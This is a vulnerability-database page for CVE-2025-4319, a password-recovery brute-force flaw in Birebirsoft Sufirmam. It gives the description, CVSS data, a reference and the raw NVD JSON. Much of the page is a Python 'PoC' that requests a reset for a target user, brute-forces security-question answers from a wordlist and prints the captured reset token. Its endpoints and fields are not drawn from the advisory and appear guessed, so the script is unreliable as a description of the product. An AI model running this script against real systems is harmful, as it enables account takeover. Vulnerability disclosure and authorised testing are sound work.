Security Vulnerability Report
CVE-2025-4319 CVSS 9.4 CRITICAL

CVE-2025-4319

Published: 2026-01-23 13:15:49
Last Modified: 2026-04-15 00:35:42

Description

Improper Restriction of Excessive Authentication Attempts, Weak Password Recovery Mechanism for Forgotten Password vulnerability in Birebirsoft Software and Technology Solutions Sufirmam allows Brute Force, Password Recovery Exploitation. This issue affects Sufirmam: through 23012026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
9.4
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H

Configurations (Affected Products)

No configuration data available.

Birebirsoft Sufirmam <= 23012026 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-4319 PoC - Sufirmam Weak Password Recovery Mechanism
# This PoC demonstrates the brute-force attack on password recovery
import requests

TARGET_URL = "https://target-system.com"  # Replace with actual target
USERNAME = "[email protected]"  # Target username/email

# Common security question answers for brute-forcing
COMMON_ANSWERS = [
    "fluffy", "max", "buddy", "cat", "dog", "john", "jane",
    "123456", "password", "admin", "test", "qwerty",
    "mother", "father", "sister", "brother", "pet",
    "birthday", "january", "february", "march", "april",
]


def test_password_recovery():
    """
    Test password recovery mechanism without rate limiting
    """
    session = requests.Session()
    # Step 1: Request password reset
    reset_url = f"{TARGET_URL}/api/password-reset/request"
    payload = {"username": USERNAME}
    try:
        response = session.post(reset_url, json=payload, timeout=10)
        if response.status_code == 200:
            print(f"[+] Password reset requested for {USERNAME}")
            return session, response.json()
    except Exception as e:
        print(f"[-] Error: {e}")
    return None, None


def brute_force_security_question(session, question_id, answers):
    """
    Brute-force security question answers
    """
    verify_url = f"{TARGET_URL}/api/password-reset/verify"
    for i, answer in enumerate(answers):
        payload = {
            "question_id": question_id,
            "answer": answer.strip().lower(),
        }
        try:
            response = session.post(verify_url, json=payload, timeout=5)
            # Check for successful verification
            if response.status_code == 200 and "success" in response.text.lower():
                print(f"[+] VULNERABLE! Answer found: {answer}")
                print(f"[+] Session token: {response.json().get('reset_token')}")
                return True
            # No rate limiting detected
            if i % 10 == 0:
                print(f"[*] Testing answer {i + 1}/{len(answers)}: {answer}")
        except Exception as e:
            print(f"[-] Request error: {e}")
            continue
    return False


def main():
    print("=" * 60)
    print("CVE-2025-4319 PoC - Sufirmam Password Recovery Brute Force")
    print("=" * 60)
    # Check if system is vulnerable to brute force
    session, reset_data = test_password_recovery()
    if session and reset_data:
        question_id = reset_data.get("question_id")
        if question_id:
            print("[*] Starting brute-force attack on security question...")
            print("[*] No rate limiting detected - VULNERABLE")
            success = brute_force_security_question(
                session, question_id, COMMON_ANSWERS
            )
            if success:
                print("\n[!] Target is VULNERABLE to CVE-2025-4319")
                print("[!] Immediate remediation required")
            else:
                print("\n[*] Attack completed - answer not found in wordlist")


if __name__ == "__main__":
    main()
```

References

https://www.usom.gov.tr/bildirim/tr-26-0005

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-4319", "sourceIdentifier": "[email protected]", "published": "2026-01-23T13:15:48.967", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Restriction of Excessive Authentication Attempts, Weak Password Recovery Mechanism for Forgotten Password vulnerability in Birebirsoft Software and Technology Solutions Sufirmam allows Brute Force, Password Recovery Exploitation.This issue affects Sufirmam: through 23012026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Restricción inadecuada de intentos de autenticación excesivos. Vulnerabilidad de mecanismo débil de recuperación de contraseña para contraseña olvidada en Birebirsoft Software y Technology Solutions Sufirmam permite Fuerza Bruta y Explotar la recuperación de contraseña. Este problema afecta a Sufirmam: hasta el 23012026. NOTA: Antes de divulgar esta vulnerabilidad se contactó con el proveedor, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}, {"lang": "en", "value": "CWE-640"}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-26-0005", "source": "[email protected]"}]}}
```